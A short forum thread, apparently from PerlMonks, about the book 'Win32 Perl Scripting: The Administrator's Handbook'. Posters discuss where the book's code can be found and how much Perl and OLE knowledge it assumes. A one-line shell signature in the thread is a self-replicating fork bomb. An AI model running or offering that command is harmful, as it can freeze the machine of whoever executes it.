in reply to Win32 Perl Scripting: The Administrator's Handbook

This is an excellent book! However, I wish that the code in the book was available on CD or for download. I have not been able to find it anywhere.

Update: Thanks to cjf-II who pointed out the code is available here

$ echo '$0 & $0 &' > foo; chmod a+x foo; foo;

Replies are listed 'Best First'.
Re: Re: Win32 Perl Scripting: The Administrator's Handbook
by Anonymous Monk on Oct 23, 2003 at 18:48 UTC
    I wish the code was available too, Unfortunatelly, this book takes for granted a very thorough understanding of BOTH perl and OLE, etc. I found this to be very aggravating...